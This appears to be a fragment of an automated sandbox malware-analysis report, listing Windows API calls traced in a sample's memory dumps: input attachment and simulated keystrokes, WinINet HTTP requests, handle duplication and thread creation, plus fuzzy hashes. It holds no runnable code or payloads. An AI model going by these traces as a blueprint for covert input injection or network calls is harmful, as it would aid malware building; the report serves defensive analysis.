                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00D746AF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 312131281-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D4BB18
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BB2C
                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00D4BB33
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BB42
                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D4BB54
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BB6D
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BB7F
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BBC4
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BBD9
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BBE4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13007
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4), ref: 00D12D4E
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: GetLastError.KERNEL32(00DB1DC4,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4,00DB1DC4), ref: 00D12D60
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13013
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1301E
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13029
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13034
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1303F
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1304A
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13055
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13060
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1306E
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00CE2AF9
                                                                                                                                                                                                                                                                  • OleUninitialize.OLE32(?,00000000), ref: 00CE2B98
                                                                                                                                                                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00CE2D7D
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00D23A1B
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00D23A80
                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D23AAD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                  • String ID: close all
                                                                                                                                                                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D589F2
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D58A06
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00D58A30
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00D58A4A
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D58A5C
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D58AA5
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00D58AF5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                                                  • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                  • Opcode ID: 512a95c43abd855fb2542b782e06cb8d7330ca4a27da11992ae3fc2fac354558
                                                                                                                                                                                                                                                                  • Instruction ID: be96bf3974e44f1711d927b36748fc15cffd713854612d7c7109f63c55835474
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 512a95c43abd855fb2542b782e06cb8d7330ca4a27da11992ae3fc2fac354558
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93818E729043459BCF24EE14C444ABAB7E8BF84352F58481AFC89E7251DF34D949AFA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00CE74D7
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7567: GetClientRect.USER32(?,?), ref: 00CE758D
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7567: GetWindowRect.USER32(?,?), ref: 00CE75CE
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7567: ScreenToClient.USER32(?,?), ref: 00CE75F6
                                                                                                                                                                                                                                                                  • GetDC.USER32 ref: 00D26083
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D26096
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00D260A4
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00D260B9
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00D260C1
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D26152
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                  • Opcode ID: 30da486d2503c9ee6a20b481e143ec4812cb0fbf7b9480fcc3efa75bf4c6421a
                                                                                                                                                                                                                                                                  • Instruction ID: 0f2fa0a3302425ae37fb2c303489e3ff047a1ec7c318a0e5de4542c09eb0668d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30da486d2503c9ee6a20b481e143ec4812cb0fbf7b9480fcc3efa75bf4c6421a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9571F031500355DFCF269F64E884ABA3BB1FF64328F184269ED599A2A6C730D850EF70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: GetCursorPos.USER32(?), ref: 00CE19E1
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: ScreenToClient.USER32(00000000,?), ref: 00CE19FE
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: GetAsyncKeyState.USER32(00000001), ref: 00CE1A23
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: GetAsyncKeyState.USER32(00000002), ref: 00CE1A3D
                                                                                                                                                                                                                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00D795C7
                                                                                                                                                                                                                                                                  • ImageList_EndDrag.COMCTL32 ref: 00D795CD
                                                                                                                                                                                                                                                                  • ReleaseCapture.USER32 ref: 00D795D3
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00D7966E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00D79681
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00D7975B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                  • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                  • Opcode ID: d230d6b0ae4325c9a00a9875899dd906c56f57358a9363f6254b91527670cc04
                                                                                                                                                                                                                                                                  • Instruction ID: c0c651556dc2a30304e87a44d56bd9685cbdbd7cdd0a71300725b97f975d070c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d230d6b0ae4325c9a00a9875899dd906c56f57358a9363f6254b91527670cc04
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17517C75104344AFDB04EF24CC56FAA77E5FF88714F400A18F99A972E1EB709948DB62
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D5CCB7
                                                                                                                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D5CCDF
                                                                                                                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D5CD0F
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D5CD67
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00D5CD7B
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00D5CD86
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: 8949092b18377ca2c3495bf143b12a155aeaaffaf9b6763a21c7920d375b0898
                                                                                                                                                                                                                                                                  • Instruction ID: 1ef17564c8a1a42145694e7a4d1f91d81a22de65fd07e86dd2b90da0342d8e33
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8949092b18377ca2c3495bf143b12a155aeaaffaf9b6763a21c7920d375b0898
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71316D71510308AFDB21AF658C88AAB7BFDEF45741B14552EFC4AD6210EB34DD489B70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D255AE,?,?,Bad directive syntax error,00D7DCD0,00000000,00000010,?,?), ref: 00D4A236
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00D255AE,?), ref: 00D4A23D
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00D4A301
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                  • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetParent.USER32 ref: 00D429F8
                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00D42A0D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D42A9A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                  • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00CE758D
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00CE75CE
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00CE75F6
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00CE773A
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00CE775B
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00D75C24
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00D75C65
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 00D75C6B
                                                                                                                                                                                                                                                                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00D75C6F
                                                                                                                                                                                                                                                                    • Part of subcall function 00D779F2: DeleteObject.GDI32(00000000), ref: 00D77A1E
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D75CAB
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D75CB8
                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00D75CEB
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00D75D25
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00D75D34
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                  • Opcode ID: fde35798c9765e8faa03c156a0fbe9143a011c7e8e9379706ea8943ff39dc9a8
                                                                                                                                                                                                                                                                  • Instruction ID: e44669dc9aed69f0a996c55d78b9cd9511d5a769886d9b8587cc822efb9cf35f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fde35798c9765e8faa03c156a0fbe9143a011c7e8e9379706ea8943ff39dc9a8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6751B334640B08BFEF359F14EC4ABA83B61EB04750F18C115F91DAA2E4E7B19990DB72
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00D228D1
                                                                                                                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00D228EA
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D228FA
                                                                                                                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00D22912
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D22933
                                                                                                                                                                                                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00CE11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00D22942
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D2295F
                                                                                                                                                                                                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00CE11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00D2296E
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0aac7811efc7317f6b8f633e1b639518c19bb83c6226ddadaaebdaad42ac52df
                                                                                                                                                                                                                                                                  • Instruction ID: 69eff15c81981852d906318ad8d9b11353e54b4fb3279968b306b8d64e055a13
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0aac7811efc7317f6b8f633e1b639518c19bb83c6226ddadaaebdaad42ac52df
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2515730640349EFDB24CF26CC45BAA7BB6EF58724F144518F956D62E0E770E990DB60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D5CBC7
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D5CBDA
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00D5CBEE
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D5CCB7
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5CC98: GetLastError.KERNEL32 ref: 00D5CD67
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5CC98: SetEvent.KERNEL32(?), ref: 00D5CD7B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5CC98: InternetCloseHandle.WININET(00000000), ref: 00D5CD86
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 337547030-0
                                                                                                                                                                                                                                                                  • Opcode ID: aee1fe6b38513d356c894cedc72b44ed0e6a418e95b4af4ca9bb57d66b521c3f
                                                                                                                                                                                                                                                                  • Instruction ID: 2376c01b46d404b7db3a2b750fac670d4d9dc110d8e7bd43f32e44d88f5987b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aee1fe6b38513d356c894cedc72b44ed0e6a418e95b4af4ca9bb57d66b521c3f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7318971210701AFCF218F65CD44A7ABBB9FF04302B14552EFC9AC6620D730E858AB70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D443AD
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: GetCurrentThreadId.KERNEL32 ref: 00D443B4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D42F00), ref: 00D443BB
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D42F0A
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00D42F28
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00D42F2C
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D42F36
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00D42F4E
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00D42F52
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D42F5C
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00D42F70
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00D42F74
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                  • Opcode ID: f120f408960af7b49b3ccaecb6f1538bc6cd83310d3c0daa256ef523c49b718a
                                                                                                                                                                                                                                                                  • Instruction ID: 6e1a395d999097f7e3b3ae7cbdc811f8992a7282976026c75f03d2fe9a2d5ffb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f120f408960af7b49b3ccaecb6f1538bc6cd83310d3c0daa256ef523c49b718a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7201B5306843147BFB106B699C8AF593F6ADF5DB61F500015F358EE1E0C9E16484CAB9
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00D41D95,?,?,00000000), ref: 00D42159
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00D41D95,?,?,00000000), ref: 00D42160
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D41D95,?,?,00000000), ref: 00D42175
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00D41D95,?,?,00000000), ref: 00D4217D
                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00D41D95,?,?,00000000), ref: 00D42180
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D41D95,?,?,00000000), ref: 00D42190
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00D41D95,00000000,?,00D41D95,?,?,00000000), ref: 00D42198
                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00D41D95,?,?,00000000), ref: 00D4219B
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00D421C1,00000000,00000000,00000000), ref: 00D421B5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
